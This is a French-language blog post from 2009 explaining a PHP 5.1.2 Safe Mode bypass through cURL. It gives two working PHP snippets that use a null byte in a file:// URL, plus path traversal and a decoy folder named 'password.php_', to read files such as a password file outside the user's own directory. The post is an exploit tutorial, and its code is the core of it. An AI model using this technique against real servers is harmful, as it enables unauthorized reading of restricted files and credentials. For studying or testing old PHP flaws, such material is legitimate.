raisep0wn

Geek Stuff & IT Security

Faille Safe Mode PHP en 5.1.2

leave a comment »

Maintenant que nous disposons d’un serveur PHP 5.1.2 en local (billet précédent), nous pouvons nous amuser à tester la faille du Safe Mode que l’on peut exploiter grâce à cURL.

<?
$ch = curl_init("file://filethatyoudonthaveaccessto.php\x00".__FILE__);
curl_exec($ch);
var_dump(curl_exec($ch));
?>

Le truc est simple, le Safe Mode va vérifier si nous pouvons lire __FILE__ et pendant ce temps cURL pourra tranquillement accéder au fichier interdit. Toutefois nous ne pouvons pas utiliser le caractère « /« , et sommes donc assez limités dans le choix de nos fichiers cibles.

Pas de panique, il y a toujours une astuce… Imaginons que nous souhaitions accéder au fichier password.php situé en dehors de notre dossier personnel. Il nous suffit de créer un dossier du même nom (password.php) d’y saupoudrer une dose de caractère « _« , et le trick est prêt (dossier : « password.php_« ).

<?
$ch = curl_init("file:///home/devil/www/yourFolder/passwords.php\x00/../../../../../../../../../".__FILE__);
curl_exec($ch);
var_dump(curl_exec($ch));
?>

Safe Mode vérifiera si vous avez bien accès à votre dossier password.php_ pendant que cURL se fera un plaisir de lire le vrai fichier password.php.

Sources : SecuriTeam.com, SecurityReason.com

Publicités

Written by Ralph

31/01/2009 à 11:55

Publié dans Geek Stuff

Tagged with , ,

Laisser un commentaire

Entrez vos coordonnées ci-dessous ou cliquez sur une icône pour vous connecter:

Logo WordPress.com

Vous commentez à l'aide de votre compte WordPress.com. Déconnexion / Changer )

Image Twitter

Vous commentez à l'aide de votre compte Twitter. Déconnexion / Changer )

Photo Facebook

Vous commentez à l'aide de votre compte Facebook. Déconnexion / Changer )

Photo Google+

Vous commentez à l'aide de votre compte Google+. Déconnexion / Changer )

Connexion à %s

%d blogueurs aiment cette page :